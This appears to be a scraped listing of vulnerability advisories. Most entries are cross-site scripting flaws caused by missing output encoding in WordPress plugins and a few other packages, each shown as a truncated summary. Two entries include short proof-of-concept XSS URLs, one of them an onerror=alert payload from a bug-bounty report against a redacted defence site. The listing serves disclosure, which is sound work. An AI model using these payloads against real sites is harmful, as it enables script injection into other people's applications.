CVE-2021-24128

WordPress Team Members plugin vulnerability CVE-2021-24128 affects versions before 5.0.4. The issue is unvalidated input and lack of output encoding in the Description/biography field, enabling an authenticated, medium-privileged attacker (contributor+) to inject arbitrary web script or HTML (sto...

CVE-2021-24128 Team Members < 5.0.4 - Authenticated Stored Cross-Site Scripting (XSS)

Unvalidated input and lack of output encoding in the Team Members WordPress plugin, versions before 5.0.4, lead to Cross-site scripting vulnerabilities allowing medium-privileged authenticated attacker contributor+ to inject arbitrary web script or HTML via the 'Description/biography' of a member...

CVE-2021-24124

Affected software: WordPress WP Shieldon plugin (versions 1.6.3 and below). Vulnerability: Unauthenticated Reflected Cross‑Site Scripting caused by unvalidated input and lack of output encoding on the CAPTCHA page, due to $_SERVER['REQUEST_URI'] being echoed without encoding. Impact: could lead t...

CVE-2021-24129 Themify Portfolio Post < 1.1.6 - Authenticated Stored Cross-Site Scripting

Unvalidated input and lack of output encoding in the Themify Portfolio Post WordPress plugin, versions before 1.1.6, lead to Stored Cross-Site Scripting XSS vulnerabilities allowing low-privileged users Contributor+ to inject arbitrary JavaScript code or HTML in posts where the Themify Custom Pan...

CVE-2021-24126

The CVE-2021-24126 entry concerns the Envira Gallery Lite WordPress plugin (versions before 1.8.3.3). The issue arises from unvalidated input and a lack of output encoding when sanitising image metadata (specifically the title) before it is rendered in the generated gallery. This handling is desc...

CVE-2021-24124 WP Shieldon 1.6.3 - Unauthenticated Cross-Site Scripting (XSS)

Unvalidated input and lack of output encoding in the WP Shieldon WordPress plugin, version 1.6.3 and below, leads to Unauthenticated Reflected Cross-Site Scripting XSS when the CAPTCHA page is shown could lead to privileged escalation...

Wordpress Constant Contact Forms 跨站脚本漏洞

Wordpress Constant Contact Forms is Wordpress open source an application plugin. It allows websites to capture visitor information directly and easily. A cross-site scripting vulnerability exists in versions of the Constant Contact Forms WordPress plugin prior to 1.8.8. The vulnerability stems fr...

Wordpress WP Customer Reviews 跨站脚本漏洞

Wordpress WP Customer Reviews is a Wordpress open source application plugin. A cross-site scripting vulnerability exists in the WP Customer Reviews WordPress plugin versions prior to 3.4.3. The vulnerability stems from the program not properly validating input and not encoding output. An attacker...

Wordpress Themify Portfolio Post 跨站脚本漏洞

Wordpress Themify Portfolio Post is Wordpress an open source application plugin . Provide a neat layout to display project information features . A cross-site scripting vulnerability exists in Themify Portfolio Post WordPress plugin versions prior to 1.1.6. The vulnerability stems from the progra...

Wordpress Team Members 跨站脚本漏洞

Wordpress Team Members is a Wordpress open source application plugin . Provide a team in the administration panel to add functionality . A cross-site scripting vulnerability exists in the Team Members WordPress plugin versions prior to 5.0.4. The vulnerability stems from the program not properly...

The vulnerability of many functions in the PHPMailer class in the PHPMailer library allows a attacker to compromise data integrity.

The vulnerability of many functions in the PHPMailer class library is related to the lack of mechanisms for encoding or encrypting output data. Exploiting this vulnerability allows a remote attacker to compromise the integrity of data...

Related Posts for WordPress < 2.0.4 - Authenticated Reflected Cross-Site Scripting (XSS)

Unvalidated input and lack of output encoding within the plugin lead to a Reflected Cross-Site Scripting XSS vulnerability within the 'lang' GET parameter while editing a post, triggered when users with the capability of editing posts access a malicious URL. PoC /wp-admin/post.php?post=1=edit〈='...

CVE-2020-29023

Improper Encoding or Escaping of Output from CSV Report Generator of Secomea GateManager allows an authenticated administrator to generate a CSV file that may run arbitrary commands on a victim's computer when opened in a spreadsheet program like Excel. This issue affects: Secomea GateManager all...

U.S. Dept Of Defense: RXSS Via URI Path - https://██████████/

Hello All I Found RXSS in your OWN Website Steps To Reproduce Go to This Link https://██████/Orders/A%22onerror='alert%60xElkomy%60'testabcd/Login.aspx?ReturnUrl=/Orders Browsers I test them on Firefox and Google Chrome. Fix:- Filter input on arrival Encode data on output Use appropriate response...

GHSA-P9VV-3945-X93H Cross-Site Scripting in semantic-ui-search

All versions of semantic-ui-search are vulnerable to Cross-Site Scripting. Lack of output encoding on the selection dropdowns can lead to user input being executed instead of printed as text. Recommendation No fix is currently available. Consider using an alternative module until a fix is made...

Cross-Site Scripting in semantic-ui-search

All versions of semantic-ui-search are vulnerable to Cross-Site Scripting. Lack of output encoding on the selection dropdowns can lead to user input being executed instead of printed as text. Recommendation No fix is currently available. Consider using an alternative module until a fix is made...

Cross-Site Scripting in mermaid

Versions of mermaid prior to 8.2.3 are vulnerable to Cross-Site Scripting. If malicious input such as A"" is provided to the application, it will execute the code instead of rendering it as text due to improper output encoding. Recommendation Upgrade to version 8.2.3 or later...

The vulnerability of the security mechanism for executing macros in the LibreOffice office software package allows a perpetrator to gain unauthorized access to confidential data, cause service failures, or compromise data integrity.

The vulnerability of the security mechanism for executing macros in the LibreOffice office software package is related to the lack of mechanisms for encoding or shielding output data. Exploiting this vulnerability can allow an attacker, operating remotely, to gain unauthorized access to...

CVE-2020-14055

Monsta FTP 2.10.1 or below is prone to a stored cross-site scripting vulnerability in the language setting due to insufficient output encoding...

Cross site scripting

Monsta FTP 2.10.1 or below is prone to a stored cross-site scripting vulnerability in the language setting due to insufficient output encoding...